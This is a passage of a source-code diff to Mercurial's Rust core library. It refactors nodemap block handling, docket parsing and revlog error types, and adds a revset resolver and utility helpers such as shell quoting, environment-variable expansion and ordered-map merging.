{ + Element::Block(int as usize) + } else if int == -1 { Element::None } else { - Element::Rev(-raw - 2) + Element::Rev(-int - 2) } } } impl From<Element> for RawElement { fn from(element: Element) -> RawElement { - match element { + RawElement::from(match element { Element::None => 0, - Element::Block(i) => i as RawElement, + Element::Block(i) => i as i32, Element::Rev(rev) => -rev - 2, - } + }) } } @@ -212,42 +180,24 @@ /// represented at all, because we want an immutable empty nodetree /// to be valid. -#[derive(Copy, Clone)] -pub struct Block([u8; BLOCK_SIZE]); +const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble -/// Not derivable for arrays of length >32 until const generics are stable -impl PartialEq for Block { - fn eq(&self, other: &Self) -> bool { - self.0[..] == other.0[..] - } -} - -pub const BLOCK_SIZE: usize = 64; +#[derive(Copy, Clone, BytesCast, PartialEq)] +#[repr(transparent)] +pub struct Block([RawElement; ELEMENTS_PER_BLOCK]); impl Block { fn new() -> Self { - // -1 in 2's complement to create an absent node - let byte: u8 = 255; - Block([byte; BLOCK_SIZE]) + let absent_node = RawElement::from(-1); + Block([absent_node; ELEMENTS_PER_BLOCK]) } fn get(&self, nybble: u8) -> Element { - let index = nybble as usize * mem::size_of::<RawElement>(); - Element::from(RawElement::from_be_bytes([ - self.0[index], - self.0[index + 1], - self.0[index + 2], - self.0[index + 3], - ])) + self.0[nybble as usize].into() } fn set(&mut self, nybble: u8, element: Element) { - let values = RawElement::to_be_bytes(element.into()); - let index = nybble as usize * mem::size_of::<RawElement>(); - self.0[index] = values[0]; - self.0[index + 1] = values[1]; - self.0[index + 2] = values[2]; - self.0[index + 3] = values[3]; + self.0[nybble as usize] = element.into() } } @@ -295,7 +245,7 @@ /// Return `None` unless the `Node` for `rev` has given prefix in `index`. fn has_prefix_or_none( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, rev: Revision, ) -> Result<Option<Revision>, NodeMapError> { idx.node(rev) @@ -316,7 +266,7 @@ /// revision is the only one for a *subprefix* of the one being looked up. fn validate_candidate( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, candidate: (Option<Revision>, usize), ) -> Result<(Option<Revision>, usize), NodeMapError> { let (rev, steps) = candidate; @@ -398,16 +348,17 @@ // Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous // bytes, so this is perfectly safe. let bytes = unsafe { - // Assert that `Block` hasn't been changed and has no padding - let _: [u8; 4 * BLOCK_SIZE] = - std::mem::transmute([Block::new(); 4]); + // Check for compatible allocation layout. + // (Optimized away by constant-folding + dead code elimination.) + assert_eq!(size_of::<Block>(), 64); + assert_eq!(align_of::<Block>(), 1); // /!\ Any use of `vec` after this is use-after-free. // TODO: use `into_raw_parts` once stabilized Vec::from_raw_parts( vec.as_ptr() as *mut u8, - vec.len() * BLOCK_SIZE, - vec.capacity() * BLOCK_SIZE, + vec.len() * size_of::<Block>(), + vec.capacity() * size_of::<Block>(), ) }; (readonly, bytes) @@ -442,7 +393,7 @@ /// `NodeTree`). fn lookup( &self, - prefix: NodePrefixRef, + prefix: NodePrefix, ) -> Result<(Option<Revision>, usize), NodeMapError> { for (i, visit_item) in self.visit(prefix).enumerate() { if let Some(opt) = visit_item.final_revision() { @@ -452,10 +403,7 @@ Err(NodeMapError::MultipleResults) } - fn visit<'n, 'p>( - &'n self, - prefix: NodePrefixRef<'p>, - ) -> NodeTreeVisitor<'n, 'p> { + fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> { NodeTreeVisitor { nt: self, prefix, @@ -613,7 +561,7 @@ amount: usize, ) -> Self { assert!(buffer.len() >= amount); - let len_in_blocks = amount / BLOCK_SIZE; + let len_in_blocks = amount / size_of::<Block>(); NodeTreeBytes { buffer, len_in_blocks, @@ -625,18 +573,17 @@ type Target = [Block]; fn deref(&self) -> &[Block] { - unsafe { - slice::from_raw_parts( - (&self.buffer).as_ptr() as *const Block, - self.len_in_blocks, - ) - } + Block::slice_from_bytes(&self.buffer, self.len_in_blocks) + // `NodeTreeBytes::new` already asserted that `self.buffer` is + // large enough. + .unwrap() + .0 } } -struct NodeTreeVisitor<'n, 'p> { +struct NodeTreeVisitor<'n> { nt: &'n NodeTree, - prefix: NodePrefixRef<'p>, + prefix: NodePrefix, visit: usize, nybble_idx: usize, done: bool, @@ -649,11 +596,11 @@ element: Element, } -impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> { +impl<'n> Iterator for NodeTreeVisitor<'n> { type Item = NodeTreeVisitItem; fn next(&mut self) -> Option<Self::Item> { - if self.done || self.nybble_idx >= self.prefix.len() { + if self.done || self.nybble_idx >= self.prefix.nybbles_len() { return None; } @@ -718,18 +665,18 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, _shortest)| opt) } fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, shortest)| opt.map(|_rev| shortest)) } } @@ -774,13 +721,13 @@ let mut raw = [255u8; 64]; let mut counter = 0; - for val in [0, 15, -2, -1, -3].iter() { - for byte in RawElement::to_be_bytes(*val).iter() { + for val in [0_i32, 15, -2, -1, -3].iter() { + for byte in val.to_be_bytes().iter() { raw[counter] = *byte; counter += 1; } } - let block = Block(raw); + let (block, _) = Block::from_bytes(&raw).unwrap(); assert_eq!(block.get(0), Element::Block(0)); assert_eq!(block.get(1), Element::Block(15)); assert_eq!(block.get(3), Element::None); @@ -822,6 +769,10 @@ ]) } + fn hex(s: &str) -> NodePrefix { + NodePrefix::from_hex(s).unwrap() + } + #[test] fn test_nt_debug() { let nt = sample_nodetree(); @@ -840,11 +791,11 @@ pad_insert(&mut idx, 1, "1234deadcafe"); let nt = NodeTree::from(vec![block! {1: Rev(1)}]); - assert_eq!(nt.find_hex(&idx, "1")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "12")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1a")?, None); - assert_eq!(nt.find_hex(&idx, "ab")?, None); + assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1a"))?, None); + assert_eq!(nt.find_bin(&idx, hex("ab"))?, None); // and with full binary Nodes assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1)); @@ -861,12 +812,12 @@ let nt = sample_nodetree(); - assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9))); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0))); - assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3))); - assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION))); + assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9))); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0))); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3))); + assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION))); } #[test] @@ -884,13 +835,13 @@ root: block![0: Block(1), 1:Block(3), 12: Rev(2)], masked_inner_blocks: 1, }; - assert_eq!(nt.find_hex(&idx, "10")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "c")?, Some(2)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3)); - assert_eq!(nt.find_hex(&idx, "01")?, Some(9)); + assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("c"))?, Some(2)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3)); + assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9)); assert_eq!(nt.masked_readonly_blocks(), 2); Ok(()) } @@ -923,14 +874,14 @@ &self, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.nt.find_hex(&self.index, prefix) + self.nt.find_bin(&self.index, hex(prefix)) } fn unique_prefix_len_hex( &self, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.nt.unique_prefix_len_hex(&self.index, prefix) + self.nt.unique_prefix_len_bin(&self.index, hex(prefix)) } /// Drain `added` and restart a new one @@ -1108,7 +1059,7 @@ let (_, bytes) = idx.nt.into_readonly_and_added_bytes(); // only the root block has been changed - assert_eq!(bytes.len(), BLOCK_SIZE); + assert_eq!(bytes.len(), size_of::<Block>()); // big endian for -2 assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]); // big endian for -6 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,5 +1,7 @@ +use crate::errors::{HgError, HgResultExt}; +use crate::requirements; +use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; -use std::convert::TryInto; use std::path::{Path, PathBuf}; use super::revlog::RevlogError; @@ -13,6 +15,16 @@ // TODO: keep here more of the data from `parse()` when we need it } +#[derive(BytesCast)] +#[repr(C)] +struct DocketHeader { + uid_size: u8, + _tip_rev: unaligned::U64Be, + data_length: unaligned::U64Be, + _data_unused: unaligned::U64Be, + tip_node_size: unaligned::U64Be, +} + impl NodeMapDocket { /// Return `Ok(None)` when the caller should proceed without a persistent /// nodemap: @@ -27,83 +39,71 @@ repo: &Repo, index_path: &Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { + if !repo + .requirements() + .contains(requirements::NODEMAP_REQUIREMENT) + { + // If .hg/requires does not opt it, don’t try to open a nodemap + return Ok(None); + } + let docket_path = index_path.with_extension("n"); - let docket_bytes = match repo.store_vfs().read(&docket_path) { - Err(e) if e.kind() == std::io::ErrorKind::NotFound => { - return Ok(None) - } - Err(e) => return Err(RevlogError::IoError(e)), - Ok(bytes) => bytes, + let docket_bytes = if let Some(bytes) = + repo.store_vfs().read(&docket_path).io_not_found_as_none()? + { + bytes + } else { + return Ok(None); }; - let mut input = if let Some((&ONDISK_VERSION, rest)) = + let input = if let Some((&ONDISK_VERSION, rest)) = docket_bytes.split_first() { rest } else { return Ok(None); }; - let input = &mut input; - let uid_size = read_u8(input)? as usize; - let _tip_rev = read_be_u64(input)?; + /// Treat any error as a parse error + fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> { + result.map_err(|_| { + HgError::corrupted("nodemap docket parse error").into() + }) + } + + let (header, rest) = parse(DocketHeader::from_bytes(input))?; + let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? - let data_length = read_be_u64(input)? as usize; - let _data_unused = read_be_u64(input)?; - let tip_node_size = read_be_u64(input)? as usize; - let uid = read_bytes(input, uid_size)?; - let _tip_node = read_bytes(input, tip_node_size)?; - - let uid = - std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; + let tip_node_size = header.tip_node_size.get() as usize; + let data_length = header.data_length.get() as usize; + let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?; + let (_tip_node, _rest) = + parse(u8::slice_from_bytes(rest, tip_node_size))?; + let uid = parse(std::str::from_utf8(uid))?; let docket = NodeMapDocket { data_length }; let data_path = rawdata_path(&docket_path, uid); - // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap` + // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap` // config is false? - match repo.store_vfs().mmap_open(&data_path) { - Ok(mmap) => { - if mmap.len() >= data_length { - Ok(Some((docket, mmap))) - } else { - Err(RevlogError::Corrupted) - } + if let Some(mmap) = repo + .store_vfs() + .mmap_open(&data_path) + .io_not_found_as_none()? + { + if mmap.len() >= data_length { + Ok(Some((docket, mmap))) + } else { + Err(HgError::corrupted("persistent nodemap too short").into()) } - Err(error) => { - if error.kind() == std::io::ErrorKind::NotFound { - Ok(None) - } else { - Err(RevlogError::IoError(error)) - } - } + } else { + // Even if .hg/requires opted in, some revlogs are deemed small + // enough to not need a persistent nodemap. + Ok(None) } } } -fn read_bytes<'a>( - input: &mut &'a [u8], - count: usize, -) -> Result<&'a [u8], RevlogError> { - if let Some(start) = input.get(..count) { - *input = &input[count..]; - Ok(start) - } else { - Err(RevlogError::Corrupted) - } -} - -fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> { - Ok(read_bytes(input, 1)?[0]) -} - -fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> { - let array = read_bytes(input, std::mem::size_of::<u64>())? - .try_into() - .unwrap(); - Ok(u64::from_be_bytes(array)) -} - fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf { let docket_name = docket_path .file_name() diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -11,22 +11,39 @@ use zstd; use super::index::Index; -use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE}; +use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; -use super::nodemap::NodeMap; +use super::nodemap::{NodeMap, NodeMapError}; use super::nodemap_docket::NodeMapDocket; use super::patch; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::Revision; +#[derive(derive_more::From)] pub enum RevlogError { - IoError(std::io::Error), - UnsuportedVersion(u16), InvalidRevision, + /// Working directory is not supported + WDirUnsupported, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, - Corrupted, - UnknowDataFormat(u8), + #[from] + Other(HgError), +} + +impl From<NodeMapError> for RevlogError { + fn from(error: NodeMapError) -> Self { + match error { + NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix, + NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(), + } + } +} + +impl RevlogError { + fn corrupted() -> Self { + RevlogError::Other(HgError::corrupted("corrupted revlog")) + } } /// Read only implementation of revlog. @@ -34,7 +51,7 @@ /// When index and data are not interleaved: bytes of the revlog index. /// When index and data are interleaved: bytes of the revlog index and /// data. - index: Index, + pub(crate) index: Index, /// When index and data are not interleaved: bytes of the revlog data data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>, /// When present on disk: the persistent nodemap for this revlog @@ -53,14 +70,12 @@ data_path: Option<&Path>, ) -> Result<Self, RevlogError> { let index_path = index_path.as_ref(); - let index_mmap = repo - .store_vfs() - .mmap_open(&index_path) - .map_err(RevlogError::IoError)?; + let index_mmap = repo.store_vfs().mmap_open(&index_path)?; let version = get_version(&index_mmap); if version != 1 { - return Err(RevlogError::UnsuportedVersion(version)); + // A proper new version should have had a repo/store requirement. + return Err(RevlogError::corrupted()); } let index = Index::new(Box::new(index_mmap))?; @@ -74,10 +89,7 @@ None } else { let data_path = data_path.unwrap_or(&default_data_path); - let data_mmap = repo - .store_vfs() - .mmap_open(data_path) - .map_err(RevlogError::IoError)?; + let data_mmap = repo.store_vfs().mmap_open(data_path)?; Some(Box::new(data_mmap)) }; @@ -111,13 +123,11 @@ #[timed] pub fn get_node_rev( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap - .find_bin(&self.index, node) - // TODO: propagate details of this error: - .map_err(|_| RevlogError::Corrupted)? + .find_bin(&self.index, node)? .ok_or(RevlogError::InvalidRevision); } @@ -130,7 +140,9 @@ let mut found_by_prefix = None; for rev in (0..self.len() as Revision).rev() { let index_entry = - self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?; + self.index.get_entry(rev).ok_or(HgError::corrupted( + "revlog references a revision not in the index", + ))?; if node == *index_entry.hash() { return Ok(rev); } @@ -144,6 +156,11 @@ found_by_prefix.ok_or(RevlogError::InvalidRevision) } + /// Returns whether the given revision exists in this revlog. + pub fn has_rev(&self, rev: Revision) -> bool { + self.index.get_entry(rev).is_some() + } + /// Return the full data associated to a revision. /// /// All entries required to build the final data out of deltas will be @@ -156,8 +173,9 @@ let mut delta_chain = vec![]; while let Some(base_rev) = entry.base_rev { delta_chain.push(entry); - entry = - self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?; + entry = self + .get_entry(base_rev) + .map_err(|_| RevlogError::corrupted())?; } // TODO do not look twice in the index @@ -180,7 +198,7 @@ ) { Ok(data) } else { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } } @@ -290,7 +308,8 @@ b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)), // zstd data. b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)), - format_type => Err(RevlogError::UnknowDataFormat(format_type)), + // A proper new format should have had a repo/store requirement. + _format_type => Err(RevlogError::corrupted()), } } @@ -300,13 +319,13 @@ let mut buf = Vec::with_capacity(self.compressed_len); decoder .read_to_end(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; decoder .read_exact(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } } @@ -315,14 +334,14 @@ if self.is_delta() { let mut buf = Vec::with_capacity(self.compressed_len); zstd::stream::copy_decode(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; if len != self.uncompressed_len { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } else { Ok(buf) } diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/revset.rs @@ -0,0 +1,62 @@ +//! The revset query language +//! +//! <https://www.mercurial-scm.org/repo/hg/help/revsets> + +use crate::errors::HgError; +use crate::repo::Repo; +use crate::revlog::changelog::Changelog; +use crate::revlog::revlog::{Revlog, RevlogError}; +use crate::revlog::NodePrefix; +use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX}; +use crate::Node; + +/// Resolve a query string into a single revision. +/// +/// Only some of the revset language is implemented yet. +pub fn resolve_single( + input: &str, + repo: &Repo, +) -> Result<Revision, RevlogError> { + let changelog = Changelog::open(repo)?; + + match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) { + Err(RevlogError::InvalidRevision) => {} // Try other syntax + result => return result, + } + + if input == "null" { + return Ok(NULL_REVISION); + } + + // TODO: support for the rest of the language here. + + Err( + HgError::unsupported(format!("cannot parse revset '{}'", input)) + .into(), + ) +} + +/// Resolve the small subset of the language suitable for revlogs other than +/// the changelog, such as in `hg debugdata --manifest` CLI argument. +/// +/// * A non-negative decimal integer for a revision number, or +/// * An hexadecimal string, for the unique node ID that starts with this +/// prefix +pub fn resolve_rev_number_or_hex_prefix( + input: &str, + revlog: &Revlog, +) -> Result<Revision, RevlogError> { + if let Ok(integer) = input.parse::<i32>() { + if integer >= 0 && revlog.has_rev(integer) { + return Ok(integer); + } + } + if let Ok(prefix) = NodePrefix::from_hex(input) { + if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap()) + { + return Err(RevlogError::WDirUnsupported); + } + return revlog.get_node_rev(prefix); + } + Err(RevlogError::InvalidRevision) +} diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -7,7 +7,12 @@ //! Contains useful functions, traits, structs, etc. for use in core. +use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; +use im_rc::ordmap::DiffItem; +use im_rc::ordmap::OrdMap; +use std::cell::Cell; +use std::fmt; use std::{io::Write, ops::Deref}; pub mod files; @@ -62,10 +67,12 @@ } pub trait SliceExt { + fn trim_end_newlines(&self) -> &Self; fn trim_end(&self) -> &Self; fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; fn drop_prefix(&self, needle: &Self) -> Option<&Self>; + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>; } #[allow(clippy::trivially_copy_pass_by_ref)] @@ -74,6 +81,13 @@ } impl SliceExt for [u8] { + fn trim_end_newlines(&self) -> &[u8] { + if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') { + &self[..=last] + } else { + &[] + } + } fn trim_end(&self) -> &[u8] { if let Some(last) = self.iter().rposition(is_not_whitespace) { &self[..=last] @@ -115,6 +129,13 @@ None } } + + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = self.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } } pub trait Escaped { @@ -176,3 +197,287 @@ None } } + +#[cfg(unix)] +pub fn shell_quote(value: &[u8]) -> Vec<u8> { + // TODO: Use the `matches!` macro when we require Rust 1.42+ + if value.iter().all(|&byte| match byte { + b'a'..=b'z' + | b'A'..=b'Z' + | b'0'..=b'9' + | b'.' + | b'_' + | b'/' + | b'+' + | b'-' => true, + _ => false, + }) { + value.to_owned() + } else { + let mut quoted = Vec::with_capacity(value.len() + 2); + quoted.push(b'\''); + for &byte in value { + if byte == b'\'' { + quoted.push(b'\\'); + } + quoted.push(byte); + } + quoted.push(b'\''); + quoted + } +} + +pub fn current_dir() -> Result<std::path::PathBuf, HgError> { + std::env::current_dir().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentDir, + }) +} + +pub fn current_exe() -> Result<std::path::PathBuf, HgError> { + std::env::current_exe().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentExe, + }) +} + +/// Expand `$FOO` and `${FOO}` environment variables in the given byte string +pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> { + lazy_static::lazy_static! { + /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301 + /// The `x` makes whitespace ignored. + /// `-u` disables the Unicode flag, which makes `\w` like Python with the ASCII flag. + static ref VAR_RE: regex::bytes::Regex = + regex::bytes::Regex::new(r"(?x-u) + \$ + (?: + (\w+) + | + \{ + ([^}]*) + \} + ) + ").unwrap(); + } + VAR_RE.replace_all(s, |captures: ®ex::bytes::Captures| { + let var_name = files::get_os_str_from_bytes( + captures + .get(1) + .or_else(|| captures.get(2)) + .expect("either side of `|` must participate in match") + .as_bytes(), + ); + std::env::var_os(var_name) + .map(files::get_bytes_from_os_str) + .unwrap_or_else(|| { + // Referencing an environment variable that does not exist. + // Leave the $FOO reference as-is. + captures[0].to_owned() + }) + }) +} + +#[test] +fn test_expand_vars() { + // Modifying process-global state in a test isn’t great, + // but hopefully this won’t collide with anything. + std::env::set_var("TEST_EXPAND_VAR", "1"); + assert_eq!( + expand_vars(b"before/$TEST_EXPAND_VAR/after"), + &b"before/1/after"[..] + ); + assert_eq!( + expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"), + &b"before111after"[..] + ); + let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after"; + assert_eq!(expand_vars(s), &s[..]); +} + +pub(crate) enum MergeResult<V> { + UseLeftValue, + UseRightValue, + UseNewValue(V), +} + +/// Return the union of the two given maps, +/// calling `merge(key, left_value, right_value)` to resolve keys that exist in +/// both. +/// +/// CC https://github.com/bodil/im-rs/issues/166 +pub(crate) fn ordmap_union_with_merge<K, V>( + left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + if left.ptr_eq(&right) { + // One of the two maps is an unmodified clone of the other + left + } else if left.len() / 2 > right.len() { + // When two maps have different sizes, + // their size difference is a lower bound on + // how many keys of the larger map are not also in the smaller map. + // This in turn is a lower bound on the number of differences in + // `OrdMap::diff` and the "amount of work" that would be done + // by `ordmap_union_with_merge_by_diff`. + // + // Here `left` is more than twice the size of `right`, + // so the number of differences is more than the total size of + // `right`. Therefore an algorithm based on iterating `right` + // is more efficient. + // + // This helps a lot when a tiny (or empty) map is merged + // with a large one. + ordmap_union_with_merge_by_iter(left, right, merge) + } else if left.len() < right.len() / 2 { + // Same as above but with `left` and `right` swapped + ordmap_union_with_merge_by_iter(right, left, |key, a, b| { + // Also swapped in `merge` arguments: + match merge(key, b, a) { + MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v), + // … and swap back in `merge` result: + MergeResult::UseLeftValue => MergeResult::UseRightValue, + MergeResult::UseRightValue => MergeResult::UseLeftValue, + } + }) + } else { + // For maps of similar size, use the algorithm based on `OrdMap::diff` + ordmap_union_with_merge_by_diff(left, right, merge) + } +} + +/// Efficient if `right` is much smaller than `left` +fn ordmap_union_with_merge_by_iter<K, V>( + mut left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone, +{ + for (key, right_value) in right { + match left.get(&key) { + None => { + left.insert(key, right_value); + } + Some(left_value) => match merge(&key, left_value, &right_value) { + MergeResult::UseLeftValue => {} + MergeResult::UseRightValue => { + left.insert(key, right_value); + } + MergeResult::UseNewValue(new_value) => { + left.insert(key, new_value); + } + }, + } + } + left +} + +/// Fallback when both maps are of similar size +fn ordmap_union_with_merge_by_diff<K, V>( + mut left: OrdMap<K, V>, + mut right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + // (key, value) pairs that would need to be inserted in either map + // in order to turn it into the union. + // + // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted, + // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>` + // with `left_updates` only borrowing from `right` and `right_updates` from + // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`. + // + // This would allow moving all `.clone()` calls to after we’ve decided + // which of `right_updates` or `left_updates` to use + // (value ones becoming `Cow::into_owned`), + // and avoid making clones we don’t end up using. + let mut left_updates = Vec::new(); + let mut right_updates = Vec::new(); + + for difference in left.diff(&right) { + match difference { + DiffItem::Add(key, value) => { + left_updates.push((key.clone(), value.clone())) + } + DiffItem::Remove(key, value) => { + right_updates.push((key.clone(), value.clone())) + } + DiffItem::Update { + old: (key, left_value), + new: (_, right_value), + } => match merge(key, left_value, right_value) { + MergeResult::UseLeftValue => { + right_updates.push((key.clone(), left_value.clone())) + } + MergeResult::UseRightValue => { + left_updates.push((key.clone(), right_value.clone())) + } + MergeResult::UseNewValue(new_value) => { + left_updates.push((key.clone(), new_value.clone())); + right_updates.push((key.clone(), new_value)) + } + }, + } + } + if left_updates.len() < right_updates.len() { + for (key, value) in left_updates { + left.insert(key, value); + } + left + } else { + for (key, value) in right_updates { + right.insert(key, value); + } + right + } +} + +/// Join items of the iterable with the given separator, similar to Python’s +/// `separator.join(iter)`. +/// +/// Formatting the return value consumes the iterator. +/// Formatting it again will produce an empty string. +pub fn join_display( + iter: impl IntoIterator<Item = impl fmt::Display>, + separator: impl fmt::Display, +) -> impl fmt::Display { + JoinDisplay { + iter: Cell::new(Some(iter.into_iter())), + separator, + } +} + +struct JoinDisplay<I, S> { + iter: Cell<Option<I>>, + separator: S, +} + +impl<I, T, S> fmt::Display for JoinDisplay<I, S> +where + I: Iterator<Item = T>, + T: fmt::Display, + S: fmt::Display, +{ + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + if let Some(mut iter) = self.iter.take() { + if let Some(first) = iter.next() { + first.fmt(f)?; + } + for value in iter { + self.separator.fmt(f)?; + value.fmt(f)?; + } + } + Ok(()) + } +} diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -17,13 +17,13 @@ use lazy_static::lazy_static; use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; +use std::ffi::OsStr; use std::fs::Metadata; -use std::io::Read; use std::iter::FusedIterator; use std::ops::Deref; use std::path::{Path, PathBuf}; -pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { +pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr { let os_str; #[cfg(unix)] { @@ -33,16 +33,24 @@ // TODO Handle other platforms // TODO: convert from 